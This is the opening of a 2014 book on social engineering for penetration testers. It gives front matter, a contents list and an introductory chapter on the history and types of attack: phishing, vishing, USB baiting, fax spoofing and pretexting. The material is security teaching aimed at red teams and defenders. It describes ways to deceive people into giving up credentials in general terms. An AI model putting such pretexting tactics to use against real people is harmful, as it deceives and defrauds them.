The Social Engineer's Playbook
The Social Engineer’s Playbook
A Practical Guide to Pretexting
Jeremiah Talamantes
Copyright © 2014 by Jeremiah Talamantes
All rights reserved. This book or any portion thereof may not be reproduced or used in any manner whatsoever without the express written permission of the publisher except for the use of brief quotations in a book review or scholarly journal.
ISBN-13: 978-0692306611
ISBN-10: 0692306617
This publication is designed to provide accurate and authoritative information in regard to the subject matter covered. The author has made every effort in the preparation of this book to ensure the accuracy of the information. However, information in this book is sold without warranty either expressed or implied. The author or publisher will not be liable for any damages caused, or alleged to be caused, either directly or indirectly by this book.
Library of Congress Control Number: 2014919212
Hexcode Publishing, Woodbury, MN
Ordering Information:
Special discounts are available on quantity purchases by corporations, associations, educators, and others. For details, contact the publisher at the above listed address.
U.S. trade bookstores and wholesalers: please contact Hexcode Publishing at: email@hexcodepublishing.com
Dedication
This book is dedicated to my beautiful family. To my precious little girl, Emmy, I hold you in the warmest place in my heart. To my new-born son, Maxwell, I love you so very much little buddy. To my beautiful wife, Katie, I am simply not worthy of you. I love you.
Contents
ACKNOWLEDGEMENTS
PREFACE
TARGET AUDIENCE
WHAT THIS BOOK COVERS
ABOUT THE AUTHOR
LIMITATION OF LIABILITY / DISCLAIMER OF WARRANTY
INTRODUCTION TO SOCIAL ENGINEERING
OVERVIEW
HISTORY
TYPES OF SOCIAL ENGINEERING
Email (Phishing/Spear phishing)
Telephone (Vishing)
Baiting
Fax
Pretexting
INFLUENCING TECHNIQUES
RECIPROCITY
AUTHORITY
SCARCITY
LlKABILITY
CONCESSION
OBLIGATION
ELICITATION
FLATTERY
FALSE STATEMENTS
ARTIFICIAL IGNORANCE
THE SOUNDING BOARD
BRACKETING
CONFIDENTIAL BAITING
PRETEXTING
RESEARCH & PLANNING
LEGAL CONSIDERATIONS
BODY LANGUAGE
Positioning
Emulating
Anchoring
INFORMATION GATHERING
OVERVIEW
INFORMATION ORGANIZATION
Overview
Dradis Framework
KeepNote
SOURCES OF INFORMATION
Online
Surveillance
TOOLS
COMPUTER BASED TOOLS
Kali Linux
Social Engineering Toolkit (SET)
Metasploit Framework
Maltego
PHYSICAL TOOLS
Cameras
GPS
Clothing
Telephone
Lock Picking
Miscellaneous Tools
THE PLAYBOOK
LEGAL & WARRANTY DlSCLAIMER
SPEAR PHISHING
Security Bulletin!
Bank Security Email Alert
IRS Audit Notice
Get Your Updates Here
Company Re-Org
TELEPHONE
The Forgetful User
Sleight of Hand
Financial Foray
Attack of the Phones
Car Tow
BAITING
Oldie but A Goody
Blazing Fast Interwebs
Save Big Money!
Recalling All Cars!
Bank Security Software
RESOURCES
Acknowledgements
I want to thank my loving parents, Ray and Alma, and my brother Johnnie and his wife, Jenell. I’d also like to thank my father-in-law, Steveo, and my mother-in-law, Beth, for all of their support. Lastly, I’d like to thank RedTeam Security for affording me the opportunity to pursue this endeavor.
RedTeam Security
http://www.redteamsecure.com
http://facebook.com/redteamsecure/
http://twitter.com/redteamsecure/
Preface
This book is about social engineering with a focus on pretexting. Social engineering is not a new concept. There are countless books on various aspects of the subject. My goal in writing this book was to provide an approach toward pretexting that wasn’t available when I began my information security career. At the time, there was little published on the topic, let alone material that honed in on pretexting. Therefore, my motivation for writing is to provide additional tactics and insight into pretexting where there is clearly a gap in available information.
My experience with social engineering started many years ago while working as a security consultant. I was fortunate enough to be exposed to the concept before actually performing the work. This helped tremendously to calm my nerves, but I always felt something was missing. While my consulting work had successful results, I felt as if I was repeating the same tactics too often. It seemed as though there wasn’t enough creativity or deeper insight into the exploitation of human behavior. My hope is that this book serves to address some of these concerns and sparks social engineers to explore human behaviors through pretexting and exploitation.
Target Audience
This book was written for any person interested in learning more about social engineering with a focus on pretexting. It is assumed, therefore, the reader has a basic working knowledge about social engineering and information technology.
This book is recommended especially for security consultants, IT security analysts, blue teams, red teams, security managers and CISOs. However, if you have an interest in securing your environment or testing other environments, this book is for you.
What This Book Covers
Introduction – introduces the concept of social engineering, its history and different types of social engineering.
Influencing Techniques – discusses several approaches toward influencing and manipulating others. Types of tactics include: reciprocity, authority, scarcity, likability, concession and obligation.
Elicitation – elicitation is a method of gaining intelligence from individuals without them being aware of it. This chapter discusses tactics, such as: flattery, being a sounding board, bracketing, confidential baiting and others.
Pretexting – covers to the psychological manipulation of people into performing actions or divulging confidential information by creating fabricated scenarios.
Information Gathering – discusses the many sources and techniques used to gather valuable intelligence for social engineering purposes.
Tools – provides an overview and guide to using social engineering tools.
The Playbook – includes a varied collection of creative, innovative pretext scenarios to use or augment.
About the Author
Jeremiah Talamantes is the founder of RedTeam Security and the founder and principal security researcher for The Plug-bot Project. Jeremiah has nearly 20 years in the IT security industry. He holds a master’s degree in information security & assurance and an executive business education from the University of Notre Dame. He is a researcher, author and adjunct faculty member at Norwich University, College of Graduate
Studies in information security & assurance. Jeremiah has served as a CISO and expert consultant to several Fortune 500 companies. He is a CISSP, CCISO, CEH, CHFI and CCENT.
Additional Resources:
Research Projects – http://www.redteamsecure.com/labs/all_projects
LinkedIn – http://www.linkedin.com/in/jtalamantes/
Facebook – http://www.facebook.com/redteamsecure
Twitter – http://twitter.com/redteamsecure
Limitation of Liability / Disclaimer of Warranty
THE PUBLISHER AND THE AUTHOR MAKE NO REPRESENTATIONS OR WARRANTIES WITH RESPECT TO THE ACCURACY OF COMPLETENESS OF THE CONTENTS OF THIS WORK AND SPECIFICALLY DISCLAIM ALL WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE. NO WARRANTY MAY BE CREATED OR EXTENDED BY SALES OR PROMOTIONAL MATERIALS. THE ADVICE AND STRATEGIES CONTAINED HEREIN MAY NOT BE SUITABLE FOR EVERY SITUATION. THIS WORK IS SOLD WITH THE UNDERSTANDING THAT THE PUBLISHER IS NOT ENGAGED IN RENDERING LEGAL, ACCOUNTING OR OTHER PROFESSIONAL SERVICES. NEITHER THE PUBLISHER NOR THE AUTHER SHALL BE LIABLE FOR DAMAGES ARISING HEREFROM. THE FACT THAT AN ORGANIZATION OR WEB SITE IS REFERRED TO IN THIS WORK AS A CITATION, SOURCE OR OTHERWISE DOES NOT MEAN THAT THE AUTHOR OR PUBLISHER ENDORSES THE INFORMATION THE ORGANIZER OF THE WEB SITE MAY PROVIDE OR RECOMMENDATIONS IT MAY MAKE.
Chapter 1:
Introduction to Social Engineering
Even within the IT community, many often misinterpret social engineering. This chapter aims to provide a comprehensive introduction to social engineering, its history and some of the concepts that surround it. Many of the tactics and theories discussed in this book may be considered unethical in certain situations. However, the tactics examined here should be used for ethical purposes only.
Social engineering techniques are often thought of as a “dark arts” that only the most elite hackers use or one sees played out in Hollywood movies. I would aim to dispel some of these beliefs by starting out with a comprehensive overview of social engineering.
This chapter will cover the following topics:
Overview of social engineering
Brief history of social engineering
Types of social engineering
Overview
According to Wikipedia, social engineering is defined as “the act of manipulating people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer systems access; in most cases the attacker never comes face-to-face with the victim.”
While Wikipedia offers a basic definition of social engineering, I would like to expand on two points. First, the definition of social engineering should be adapted slightly to state that it involves the act of manipulating a person into performing actions that are not in the target’s best interest. That is to say, the goal of this book is to provide social engineering techniques to be used in attack scenario simulations where the target (victim) is not in a position of benefitting from the situation. Secondly, the Wikipedia definition also indicates that the attacker almost never comes into physical contact with the victim in real life. This is partly true. A social engineering attack is ordinarily accomplished without face-to-face contact, but the pendulum is beginning to swing in the other direction. Social engineering attacks with some level of physical contact have been rising steadily over the years.
So far we’ve learned that social engineering attacks are directed at people in an effort to get them to do something beneficial to the attacker such as, getting victims to divulge passwords and credit card information. But the question is, how is this primarily accomplished? The definitive answer to this question is through the manipulation of the human element – trust.
It can easily be said that social engineering is the exploitation of human behavior and trust. After all, convincing or enticing people to do things such as divulging their passwords and other sensitive information is not so straightforward as one might think. Persuading people to give up this kind of information often involves not only planning, deceptiveness and a deep understanding of the factors of human psychological behaviors. It’s no wonder that most victims feel attacked on a very personal level.
Social engineers prey on the human intrinsic traits of people wanting to be helpful and wanting to be liked. They understand these traits at a deeper level and craft their attacks accordingly. It is a plan of attack that involves playing on human emotion, deceptive tricks and lies and the service industry is often smack dab in the crosshairs. After all, what better industries to exploit than those that are supposed to be helpful and courteous? This is especially true in the Hospitality industry. But does it mean that service people should be defensive and rude? Absolutely not. It does, however, call for is a change in behavior and the wherewithal to know when you’re under attack and what to do about it.
Before digging deeper into the specifics of social engineering tactics, let’s take a look at the history of social engineering.
History
Some believe social engineering began as a result of recent technological advances, such as email spear phishing. The practice, however, has been around for ages in a number of different forms. It has merely evolved over the years.
Photo of Charles Ponzi – famous con artist
George Parker is responsible for the popular expression, “And if you believe that, I have a bridge to sell you.” Many have used the expression but might no understand exactly where it came from. In the early 1900s, George Parker used social engineering tactics to con tourists into buying famous landmarks, such as the Brooklyn Bridge. Also who could forget Charles Ponzi? In 1920 he was exposed in a massive “Ponzi scheme” to swindle money out of investors with the promises of unbelievable returns.
Kevin Mitnick and Frank Abagnale are two more examples of extraordinary social engineers. who carried out their exploits resulting in theft of proprietary software to masquerading as a Pan Am airline pilot.
One such historic example of social engineering is Ulysses, the leader of the Greek army, who built the infamous Trojan horse that ultimately led to the fall of Troy. During a siege in this historic battle, Ulysses managed to trick the Trojan army into believing his men had given up by leaving a large wooden horse as a sign of retreat just outside of the city’s gates. Well, I think we all know how the story played out. How does this story apply today? The Trojan horse strategy might as well be a page torn right out of today’s social engineer’s playbook. As the old adage goes, “History, with all her volumes vast, hath but one page.”
Types of Social Engineering
Unbeknownst to many, there are several types of social engineering attacks. It seems only the most elaborate ones are glamorized in the movies or manage to get press coverage. According to the Verizon Data Breach Report 2012, 37% of all records breached were the result of a social engineering attack. Those attacks weren’t the result of some elaborate scheme to take over a nuclear power plant or launch missiles into space. Instead, they involved classic social engineering tactics called, ”Pretexting.” Pretexting is a common tactic where a social engineer masquerades himself/herself as a person of authority. This usually plays itself out as a social engineer pretending to be a network support person who urgently needs access to the company’s server room in order to ”fix” something. Or he/she is pretending to be a friend or colleague with an important email attachment for you to see. Using these delivery mechanisms, a social engineer can be very creative with their pretext.
Email (Phishing/Spear phishing)
Phishing is a form of social engineering that is designed to acquire information about someone (username, password, bank information, etc.) while purporting to be someone of authority, such as Facebook or a bank. Phishing emails are designed to look and feel like they’re coming from a trusted authority but whose intent is to spread malware or steal data through malicious hyperlinks or HTML forms. Phishing attacks cast a wide net attempting to reel
in as many victims as possible, while spear phishing attacks are targeted attacks pointed directly at either a company, industry or even specific people.
An example of a spear phishing email
Telephone (Vishing)
Telephone or voice phishing, also referred to as “vishing,” is a social engineering attack conducted over the telephone. This form is used by attackers to steal banking information by purporting to be a representative from their bank’s fraud department while asking the victim to validate his or her account by giving credit card information over the phone. In an attack against a business, an attacker often pretends to be help desk support, an executive end users or another position of authority.
This form of social engineering is used quite heavily. According to statistics, those outside of the United States perform this type of social engineering often. This is mostly due to the remote aspect and the perceived safety of not being physically present.
Baiting
Scattering USB drives around a company’s front door is a popular form of “baiting” a victim. USB drives labeled with interesting titles (“swimsuit pics” or “payroll”) trigger human curiosity. Meanwhile, malicious programs on the USB drive are designed to silently launch and attack once plugged into a computer. A security consultant named Steve Stasuikonis originally made this kind of social engineering popular many years ago and its popularity continues to today.
Fax
Fax? Yes, fax. It’s true people still fax documents. In fact, some organizations make heavy use of faxed documents. Many financial organizations exchange requests and authorizations for things such as credit checks and respond back via fax with personally identifiable information. These companies are among the many that face social engineering threats of this type. With the half-duplex, analog nature of facsimile, it becomes rather trivial to spoof fax headers and “become” an organization of authority. All in all, the fax machine breathes on and is expected to be an attack surface going forward.